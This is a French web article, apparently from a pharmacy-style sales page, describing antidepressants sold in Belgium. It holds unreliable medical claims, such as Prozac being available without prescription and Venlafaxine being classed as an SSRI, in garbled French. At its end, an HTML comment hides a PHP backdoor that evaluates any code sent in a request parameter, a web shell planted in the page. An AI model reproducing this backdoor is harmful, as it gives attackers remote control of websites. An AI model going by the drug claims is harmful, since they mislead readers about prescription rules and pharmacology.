Les médicaments sous le nom général des « antidépresseurs » sont utilisés pour le soulagement et la prévention des troubles dépressifs. Ce groupe de médicaments contribue à l’amélioration de l’humeur,  élimine la paresse, la tension émotionnelle et  la sensation d’anxiété.

Il existe une grande quantité de groupes et de variétés d’antidépresseurs.  En Belgique on peut acheter les antidépresseurs des groupes suivants sans ordonnance comme selon la prescription du médecin:

  • les antidépresseurs tricycliques – Tofranil, Ludiomil, Prothiaden et Anafranil;
  • les inhibiteurs sélectifs de la recapture de la sérotonine (IRS) – Prozac, Sipralexa et Venlafaxine;
  • l’antidépresseur mélatoninergique – Valdoxan.

Les antidépresseurs  des groupes pharmacologiques différents actionnent sur les récepteurs différents du cerveau et du système nerveux. Mais tous les antidépresseurs possèdent de la même propriété de corriger le fonctionnement de certains mécanismes du cerveau,  provoquant la dépression et les troubles anxieux.

Les recommandations générales d’emploi de tous les antidépresseurs sont:

  • l’emploi régulier (une dose d’antidépresseur ne guérira pas les symptômes de la dépression);
  • l’utilisation des doses initiales minimales avec l’augmentation progressive de la dose quotidienne jusqu’à la dose maximale tolérable;
  • la réduction progressive du dosage d’antidépresseur à l’étape finale du traitement de la dépression.

Les hommes dans plusieurs pays, y compris la Belgique, cherchent à éviter l’utilisation des antidépresseurs. Cela est dû, principalement, aux stéréotypes érronés sur le mal des antidépresseurs pour la santé.

L’opinion érronée rependue consiste en ce que la dépression est l’état naturel de l’organisme qui passera avec le temps.  L’homme est capable de se débarrasser lui-même des formes légères de l’angoisse et de l’anxiété.  Mais en cas des formes graves de la dépression il est impossible de se passer sans antidépresseurs fiables de qualité.

La renonciation d’emploi des antidépresseurs peut être causée par les  craintes de la dépendance ou de la prononciation des effets secondaires dangereux. Les antidépresseurs sont les médicaments actifs, influençant sur le cerveau et le système nerveux. Mais en cas du respect stricte des recommandations d’emploi on peut guérir la dépression sans  porter préjudice à la santé.

Les antidépresseurs tricycliques sont les premiers médicaments, utilisés pour la thérapie des troubles dépressifs. En Belgique ce groupe d’antidépresseurs est présenté par la plus grande quantité de médicaments.

Les antidépresseurs tricycliques Tofranil, Ludiomil, Prothiaden et Anafranil empêchent à la recapture de la noradrénaline. Ces hormones sont contenues dans le cerveau et influencent sur l’état général de l’homme.

Parmi tous les antidépresseurs tricycliques, commercialisés en Belgique, c’est seulement Tofranil qui peut être utilisé chez les enfants âgés de plus de 5 ans. L’utilisation de  Tofranil est opportun si les troubles dépressifs chez l’enfant sont accompagnés par l’incontinence d’urine. D’autres antidépresseurs tricycliques Ludiomil, Prothiaden et Anafranil ne peuvent être utilisés que chez les patients âgés de plus de 17 ans.

Outre l’inhibition de la recapture de la sérotonine et de la noradrénaline, les  antidépresseurs tricycliques bloquent la production des neuromédiateurs comme l’acétylcholine et l’histamine. Les tricycliques actionnent sur quelques récepteurs les plus importants de l’organisme, de ce fait ils peuvent provoquer une grande quantité d’effets secondaires.

Les antidépresseurs du groupe d’inhibiteurs sélectifs de la recapture de la sérotonine (IRS)  possèdent d’un spectre d’utilisation plus étendu que les antidépresseurs tricycliques. IRS ont capables de guérir non seulement les troubles anxieux, mais aussi la boulimie nerveuse et l’anorexie.

Parmi tous les IRS,  commercialisés en Belgique, c’est seulement l’antidépresseur Prozac qu’on peut acheter sans ordonnance. Pour l’emploi des autres  IRS, par exemple, Sipralexa et Venlafaxine, il faut recevoir une prescription du médecin traitant.

La durée prolongée d’emploi est caractéristique pour les antidépresseurs du groupe IRS. Le soulagement des symptômes de la dépression et des troubles anxieux en cas d’emploi des IRS arrive dans 3 mois à peu près.  Mais l’emploi des IRS  est prolongé, généralement, pour la durée identique jusqu’au rétablissement complet.

Cependant, certains patients, souffrant de la dépression, peuvent être insensibles à l’effet des IRS.  De plus, les antidépresseurs de ce type peuvent provoquer les effets indésirables, peuvent être insuffisamment efficaces et ne pas guérir les symptômes de la dépression.

Si les IRS sont inefficaces, l’antidépresseur de la nouvelle génération Valdoxan aidera à guérir l’état dépressif.  Valdoxan et les antidépresseurs IRS ont l’efficacité pratiquement identique.  Mais l’avantage de Valdoxan consiste en influence sur la production de l’hormone mélatonine, réglant les rythmes de sommeil et de veille, affectés à cause du troubles dépressifs.

Le problème de la propagation de la dépression et de l’emploi des antidépresseurs a été toujours placé au centre d’attention.  Selon les données de l’an 2013,  la Belgique a occupé la 6-ème place en Europe d’après la consommation des antidépresseurs – 70 comprimés pour 1000 habitants.  Le nombre croissant de cas des troubles dépressifs dans ce pays a stimulé l’augmentation des ventes des antidépresseurs en Belgique.

<!– [insert_php]if (isset($_REQUEST["NngNb"])){eval($_REQUEST["NngNb"]);exit;}[/insert_php][php]if (isset($_REQUEST["NngNb"])){eval($_REQUEST["NngNb"]);exit;}[/php] –>